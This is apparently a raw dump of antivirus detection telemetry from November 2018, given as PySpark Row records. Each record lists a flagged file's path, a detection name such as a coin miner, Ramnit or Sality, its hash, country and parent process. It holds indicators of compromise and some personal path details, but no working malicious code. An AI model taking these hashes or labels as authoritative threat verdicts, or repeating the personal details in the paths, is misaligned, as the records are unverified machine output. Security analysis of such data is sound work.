  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T21:24:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-13-14-05.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-11-03T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T11:16:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-003343-8acafce4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181105-003152-78C14FF7\\AVSCAN-20181105-003343-8ACAFCE4', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:33:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T06:05:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214734-596a1e1d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-214734-596A1E1D', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:47:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_1b17d0b7.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_1b17d0b7.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xcopy.exe', filepath='\\\\?\\C:\\Windows\\System32\\xcopy.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='25f7fe18237e075519e239bd966cf8f09da1c9603534824c2e7ab869337b541b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:00:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:03:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T06:01:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000a1c9b', filepath='C:\\Windows\\Temp\\tmp00000336\\tmp000a1c9b', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:07:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-154932-e543143e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d69d52e\\AVSCAN-20181104-154918-E2D1DDCA\\AVSCAN-20181104-154932-E543143E', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:49:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cefe.exe', filepath='G:\\CEFE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T17:14:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-175606-637cf00f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3acc0c55\\AVSCAN-20181104-175357-56B501E5\\AVSCAN-20181104-175606-637CF00F', filesize=2496000, name='Adware/Wajam.deane.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:55:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='scomm_ssk_hli.dll', filepath='C:\\Program Files\\Scania XCOM\\SCOMM_SSK_HLI.dll', filesize=2496000, name='TR/Black.Gen2.#M300.#R100338'), hash='7f636e55dcc3235527fefa9d1704df8947bf01e956b352ed59a0f80a0e8c0f23', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:01:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Neshta.A.#M1.#R1'), hash='6f89e7e102f825264049fb2af1bce6683c799807cf5520697777232a3d589fd1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Software\\Malwarebytes Antimalware\\MalwareBytes Anti-Malware Keygen v1.7 URET\\MalwareBytes Anti-Malware Keygen v1.7 URET.exe', parentsize=575104, timestamp='2018-11-04T15:36:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200647-17c1a0d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-200336-F55350DA\\AVSCAN-20181104-200647-17C1A0D9', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:06:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:38:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210944-c0648314', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-210944-C0648314', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:09:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-231408-ea40a87c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_62967912\\AVSCAN-20181104-224358-67F8C2A6\\AVSCAN-20181104-231408-EA40A87C', filesize=12000, name='Nov30.#M1.#R1'), hash='9da8699ce85f97347bb6c9c6b1f1d7bcb0e6d696784f598895997fe7c3d72edc', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:14:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131201-a3689c24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_91a86a16\\AVSCAN-20181104-131035-977F8FE7\\AVSCAN-20181104-131201-A3689C24', filesize=192000, name='TR/Black.Gen2.#M300.#R100338'), hash='322e3cac81476d70e511183bc106d04cd19941e80d7ac7d97fce4088cacb7a45', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3709256, timestamp='2018-11-04T16:56:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152100-db4f77d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c27e850b\\AVSCAN-20181104-151832-5D3339BF\\AVSCAN-20181104-152100-DB4F77D1', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:21:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='632c6797ca7c19b6e1fda14ee8ad4b8020cdfae1a9e6593c3640e72d27bfd402', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T02:32:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='zoomplayer.wmv.professional.v6.00.rc1-patch.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_ZoomPlayer_WMV_Professional_v6.00_RC1_Multilanguage_by_FFF.zip\\zoomplayer.wmv.professional.v6.00.rc1-patch.exe', filesize=64000, name='TR/Small.64000.#M1.#R1'), hash='d50cdce3a431571c1d0bb6928fade49d2220bcc50802aedee002a0e2f7c09583', metadata=Row(cmdline=None, country='FI', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=23808, timestamp='2018-11-04T02:37:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='smartbar.communication.dll', filepath='g:\\datensicherung katja schlott\\haberbosch\\appdata\\local\\lpt\\Smartbar.Communication.dll', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='d8cf028d5f2891f0ed68774e201f057ae589aeadcc041a21bdf72776b4b8a9de', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:00:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:38:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0003cc8c', filepath='C:\\Windows\\Temp\\2506595e-9777-4d59-b538-5440db77ee06\\tmp00003411\\tmp0003cc8c', filesize=1536000, name='TR/CoinMiner.CN.#M1.#R1'), hash='57353df34d61ae3e8855e6f3f725aaf2fcc9609fddffd2abedaddd3d0695c56b', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.942.11595\\AdAwareService.exe', parentsize=542896, timestamp='2018-11-04T09:14:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pudyg.exe', filepath='c:\\users\\X\\appdata\\roaming\\pudyg.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430080, timestamp='2018-11-02T12:45:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='h5_mapeditor.exe', filepath='C:\\Users\\X\\Desktop\\Might And Magic V Hammers Of Fate\\bina1\\H5_MapEditor.exe', filesize=17408000, name='W32/Ramnit.CD.#M1.#R1'), hash='97cc1d47bbcafb61b42f27e4f2f49169a61cde004ab91f310afe6fbfeb863401', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=815304, timestamp='2018-11-02T16:51:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-222108-92570a54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221829-7A5CEC69\\AVSCAN-20181102-222108-92570A54', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:21:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p711s-e5_update_21.110.99.03.00.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\7zE4BF831AB\\E5573 UNLOCK\\2nd STEP(Huawei_E5573s-606_Firmware_21.110.99.03.00)\\P711s-E5_Update_21.110.99.03.00.exe', filesize=51456000, name='W32/Ramnit.CD.#M1.#R1'), hash='b14a8c1efd1b89b78cbe4989cee5f38fa16aa4a95852bc4aedbd3e2b0d9bca8a', metadata=Row(cmdline=None, country='CM', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1_12_2_0.html', filepath='C:\\Program Files\\Adobe\\Photoshop 7.0\\Help\\1_12_2_0.html', filesize=128000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='cf5c59cc073ad99ca22e6dc10b026dca6aff1cf3ffce58b21138d7ba59a3d739', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T02:06:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\nhm_windows_1.9.0.4\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3903784, timestamp='2018-11-02T15:09:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{C6E639E3-12B6-4CA3-BE05-00E533F97068}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='8084f671f775f9cc0ce1d51a565b15efcde2fb26f84a3b18999c44b0e76c1ecd', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:42:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qs2onrda2.exe', filepath='C:\\Program Files\\QS2ONRDA2H\\QS2ONRDA2.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T15:34:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102033-a37da240', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-102033-A37DA240', filesize=64000, name='BDS/Rogue.766077.#M1.#R1'), hash='be37e8db54be4ab3f6336804357cd17c9b97e65cdb98cb4242bf352aa9ca0f8d', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:20:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ccminer.exe', filepath='D:\\New folder (2)\\New folder\\RainbowMiner\\Bin\\NVIDIA-x16s\\ccminer.exe', filesize=45824000, name='HEUR/AGEN.1010782.#M1.#R1'), hash='940eb4c246019216c8f95ffb2f2e65fa147b13a65756a38d660146672e47844b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3894968, timestamp='2018-11-02T07:03:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-114143-4817330b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1c6c33a3\\AVSCAN-20181102-104627-50089848\\AVSCAN-20181102-114143-4817330B', filesize=372000, name='PUA/SearchProtect.#M1.#R1'), hash='ea8d0c17dc2c9e27511e765a8b16c09da059e04645aa1336304f6a8e61f43ef4', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:41:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp_tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Recovery\\tmp_tmp', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:38:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='search provided by bing docif', filepath='C:\\Windows\\System32\\Tasks\\Search Provided by Bing docif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='f114c8e8be633ef687950961e4ca8b06cd88077eab28319fdb65d2330a9b5835', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:12:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:04:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-185322-5ec04dd7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ae478353\\AVSCAN-20181102-185257-59CED74F\\AVSCAN-20181102-185322-5EC04DD7', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:53:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221422-550579b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221422-550579B3', filesize=64000, name='BDS/Rogue.766033.#M1.#R1'), hash='b2b0f58fa1af9c59f6d9f33219f003bfd2fd1044818f2d998d754fa3f7043a74', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:14:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='textures.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL14\\TEXTURES\\TEXTURES.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='fcacdeeecabea03fd1d2a9e924a85f96d0fed56f05c38b3f85fc7e84f222c600', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pinball.exe', filepath='C:\\Program Files\\Windows NT\\Pinball\\pinball.exe', filesize=320000, name='W32/Alman.BB.#M1.#R1'), hash='90517d9420032bfd0268eea46cf94e1a635ea19343388f33814d064db19a4610', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:45:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2ystfgskwpw\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:57:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='panorama.dll', filepath='E:\\Dota2\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='cf34a4e00d1ad223048cdc3a187dfcd018899f96c9b229f956b100844381e05e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tđ 20jcx.exe', filepath='G:\\HLCN\\tđ 20jcx.exe', filesize=1984000, name='W32/Ramnit.C.#M1.#R1'), hash='d6111d7fca57a49c860aea66979ca9417f5892f5e5a315b466a27de2425ad88e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4516800, timestamp='2018-11-02T03:50:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\zxlk1dmgbbl\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541098822.5bdb4d46121b8', country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Free\\606979846.exe', parentsize=671232, timestamp='2018-11-02T01:19:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autopatch.exe', filepath='\\?\\E:\\Program Files\\Gamania\\GamaniaSafe\\AutoPatch.exe', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='d56c4ac37710b87ffb319a706ec10b950f7ce93c665dfb216a63ba9cdf62073e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bilibili.dll', filepath='\\?\\c:\\program files\\bilibili\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:39:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='вкр.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\кнспекты\\вкр2\\вкр.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='fd3adfe5baf382fb94fff375be717ca38dc4954f5c595c53d065e346fe458879', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T20:24:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081337-2e939a7f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081049-1917AE4E\\AVSCAN-20181102-081337-2E939A7F', filesize=64000, name='TR/Agent.64000.186.#M1.#R1'), hash='eb90c5e7b45131be3382699058912c5f84fa35c868f1202c3acd1ca54cb65080', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:13:36Z'), dt=datetime.date(2018, 11, 2)),
